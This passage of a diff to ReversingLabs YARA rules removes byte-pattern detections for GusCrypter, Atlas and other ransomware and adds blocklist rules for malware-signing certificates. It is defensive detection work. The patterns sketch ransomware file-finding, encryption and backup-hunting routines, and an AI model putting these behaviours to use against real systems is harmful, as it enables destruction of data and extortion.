-            ?? 6A ?? 8D 4C 24 ?? 51 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15
-            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ??
-            ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83
-            C4 ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 68 ?? ??
-            ?? ?? 50 57 E8 ?? ?? ?? ?? 8B C8 89 44 24 ?? B8 ?? ?? ?? ?? F7 E9 C1 FA ?? 8B C2 C1
-            E8 ?? 03 C2 69 C0 ?? ?? ?? ?? 8B D1 2B D0 85 D2 7E ?? 41 89 4C 24 ?? 33 C0 89 44 24
-            ?? 3B C8 0F 8E ?? ?? ?? ?? 89 44 24 ?? EB ?? 90 8B 7C 24 ?? 8B 44 24 ?? 8B 4C 24
-        }
-		$encrypt_files_p3 = {
-            99 2B F8 1B CA 89 7C 24 ?? 89 4C 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ??
-            ?? 8B C6 99 3B CA 7F ?? 7C ?? 3B F8 73 ?? 6A ?? 6A ?? 51 57 E8 ?? ?? ?? ?? 8B F7 2B
-            F0 85 F6 0F 8E ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 33 C0 83 C4 ?? 89 44 24 ?? 89 44
-            24 ?? 3B F8 0F 84 ?? ?? ?? ?? 50 8D 44 24 ?? 50 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 39 74 24 ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B CE F7 D9 51 53 FF 15 ??
-            ?? ?? ?? 56 57 8D 44 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 52 56 57 53 FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7C
-            24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 8B 44 24 ?? 81 44 24 ?? ?? ?? ?? ?? 40 89 44 24 ?? 3B 44 24 ?? 0F 8C
-            ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? EB ?? 53 FF 15 ?? ?? ?? ?? 85 FF 74 ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 68
-        }
-		$encrypt_files_p4 = {
-            8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D
-            74 24 ?? 8D BC 24 ?? ?? ?? ?? F3 A5 8B 4C 24 ?? 6A ?? 89 8C 24 ?? ?? ?? ?? 8B D0 8D
-            4C 24 ?? 51 C1 FA ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 52 53 C7 44 24 ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 94 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 5F 5E
-            5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 8B 8C
-            24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_MS_xchange_backups_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ??
-            8B 1D ?? ?? ?? ?? B0 ?? 88 44 24 ?? 88 44 24 ?? B0 ?? 83 C4 ?? C6 44 24 ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 88 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 66 C7 44 24 ?? ?? ?? C6 44 24 ?? ?? 88 44 24
-            ?? 88 44 24 ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B FF 68 ?? ?? ?? ?? 8D 8C 24
-            ?? ?? ?? ?? 6A ?? 51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 54 24 ??
-            52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 6A ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 D2 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ??
-            8D 44 24 ?? 50 8D 4C 24 ?? 51 52 52 52 52 52 52 66 89 54 24 ?? 8D 94 24 ?? ?? ?? ??
-            52 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 6A ?? FF D7 83 C6 ??
-            FF 4C 24 ?? 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D 49 ??
-            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 C6 84 24 ?? ?? ?? ?? ?? E8
-        }
-		$find_MS_xchange_backups_p2 = {
-            83 C4 ?? 56 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 6A
-            ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 33 C9 8D 54 24 ?? 52 89 44 24
-            ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 51 51 51 51 51 51 66 89 4C 24
-            ?? 8D 8C 24 ?? ?? ?? ?? 51 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
-            D3 6A ?? FF D7 83 C6 ?? FF 4C 24 ?? 0F 85 ?? ?? ?? ?? 33 D2 68 ?? ?? ?? ?? 52 8D 84
-            24 ?? ?? ?? ?? 50 66 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 B1 ?? EB ?? 8D 49 ??
-            30 88 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ??
-            51 C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ??
-            ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 8D 4C 24 ?? 51 8D 54 24 ?? 52 50 50 50 50 50 50 89 44 24 ?? 89
-            44 24 ?? 89 44 24 ?? 89 44 24 ?? 66 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF D3 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC
-            E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $find_MS_xchange_backups_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Soblosol Limited" and ( pe.signatures [ i ] . serial == "00:95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" or pe.signatures [ i ] . serial == "95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" ) and 1543968000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Guscrypter : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GusCrypter ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64aa468c-ec24-58aa-8ea9-23f0cebed227"
-		date = "2020-11-26"
-		modified = "2020-11-26"
+		id = "8dfc50be-7316-5a52-937b-4551aa642b7e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.GusCrypter.yara#L1-L129"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cfe6005028c0e5f5d713af2a549574203678bab2ee48acc1727702bcf91522b1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15406-L15424"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3b5e5b81890f1dea3dc0858cade54e7f88a21861818be79c3e7fba066f80d491"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GusCrypter"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 45 ?? 8B 5D ?? 83 FB ?? 8B 75 ?? 8B 4D ?? 0F 43 C6 83 F9 ?? 75 ?? 80 38 ?? 0F
-            84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? BA ?? ?? ?? ?? 66 39 10 0F
-            84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 66 81 3A ?? ?? 75 ?? 80 7A
-            ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 81 3A ?? ?? ?? ?? 75 ??
-            66 81 7A ?? ?? ?? 75 ?? 80 7A ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 FB ?? 0F
-            43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83
-            EF ?? 73 ?? 8A 01 3A 02 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 F8
-            ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF ?? 73 ??
-            66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D
-            ?? 0F 43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2
-            ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 4D
-            ?? 8D 45 ?? 83 FB ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ??
-            ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75
-        }
-		$find_files_p2 = {
-            81 38 ?? ?? ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83
-            F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ??
-            81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ??
-            0F 43 CE 83 7D ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ??
-            83 C2 ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ??
-            83 FB ?? 8D 45 ?? 0F 43 C6 83 7D ?? ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ??
-            ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 7D
-            ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF
-            ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0 75
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ??
-            ?? 8B CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
-            C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ??
-            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B BD ?? ?? ?? ?? C6 45 ?? ?? 83 FB ?? 72 ?? 43 8B C6 81 FB ?? ?? ?? ??
-            72 ?? 8B 76 ?? 83 C3 ?? 2B C6 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 53 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF
-            15
-        }
-		$encrypt_files_p1 = {
-            88 84 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7C ?? 33 FF 33 F6 8B C6 8A 9C 35 ?? ?? ?? ??
-            99 F7 7D ?? 0F B6 04 0A 03 F8 0F B6 CB 03 F9 81 E7 ?? ?? ?? ?? 79 ?? 4F 81 CF ?? ??
-            ?? ?? 47 8A 84 3D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 88 84 35 ?? ?? ?? ?? 46 88 9C 3D ??
-            ?? ?? ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50
-            E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8B 4D ?? 32 D2 E8 ?? ?? ?? ??
-            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D
-            ?? 42 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
-            F8 ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45
-            ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 BD ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 33 F6
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
-        }
-		$encrypt_files_p2 = {
-            0F BE 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 46 83 C4 ?? 83 FE ?? 7C ?? 53 E8 ?? ?? ??
-            ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83
-            7D ?? ?? 8D 4D ?? 8A 85 ?? ?? ?? ?? 0F 43 4D ?? C7 45 ?? ?? ?? ?? ?? 88 01 C6 41 ??
-            ?? 33 C9 8B 75 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            4D ?? 83 7D ?? ?? 8B F8 0F 43 4D ?? 56 57 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE
-            07 FF B5 ?? ?? ?? ?? 35 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B
-            BD ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ??
-            83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 32 D2 C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 50 ?? 8B C1
-            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ??
-            ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$misc_checks_p1 = {
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83
-            F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ??
-            ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
-            84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-        }
-		$misc_checks_p2 = {
-            85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ??
-            ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $misc_checks_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "INC SALYUT" and ( pe.signatures [ i ] . serial == "00:df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" or pe.signatures [ i ] . serial == "df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" ) and 1613433600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Atlas : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Atlas ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2c702b24-4b7e-505c-a694-0d915cc47315"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "c2cbd1fd-ef68-5128-9c45-88b73a49130f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Atlas.yara#L1-L99"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1486f931ec096a00d913de0568ddd8aa5a091256445bc28aba90e3e194ebd045"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15426-L15442"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "43b56736afe081a1215db67b933413d7fbafbfc1be8213b330668578921ebca7"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Atlas"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            8B 74 24 ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 52 56 FF D7 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 50 8B 84 24 ??
-            ?? ?? ?? 51 52 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 8D 4C 24 ?? 8D 84 24 ?? ?? ??
-            ?? 6A ?? 51 8B 4C 24 ?? 52 50 51 FF 15 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 55 53 56 FF
-            D7 8B 7C 24 ?? 33 C9 3B FD 89 4C 24 ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 33 F6 8A
-            84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34 ?? 8A 84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34
-            ?? 46 83 FE ?? 7C ?? 8B 74 24 ?? 57 56 8D 44 24 ?? 53 8D 8C 24 ?? ?? ?? ?? 50 51 E8
-            ?? ?? ?? ?? 8B 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 53 56 8D 8C 24 ?? ?? ?? ?? 50 51 E8
-            ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 6A ?? 52 50 53 51 FF 15 ??
-            ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 6A ?? 52 55 53 50 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B
-            7C 24 ?? 41 3B FD 89 4C 24 ?? 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 85 FF 74 ?? 8B 54 24 ??
-            8D 4C 24 ?? 6A ?? 51 57 53 52 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 44 24
-            ?? 50 FF D6 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 4C 24 ?? 68 ?? ?? ??
-            ?? 6A ?? 51 FF D6 5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$remote_server_1 = {
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C9 8D 94 24 ?? ?? ?? ?? 8A 0C 2E
-            8D 84 24 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ??
-            ?? ?? 7C ?? 8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 52 E8 ?? ??
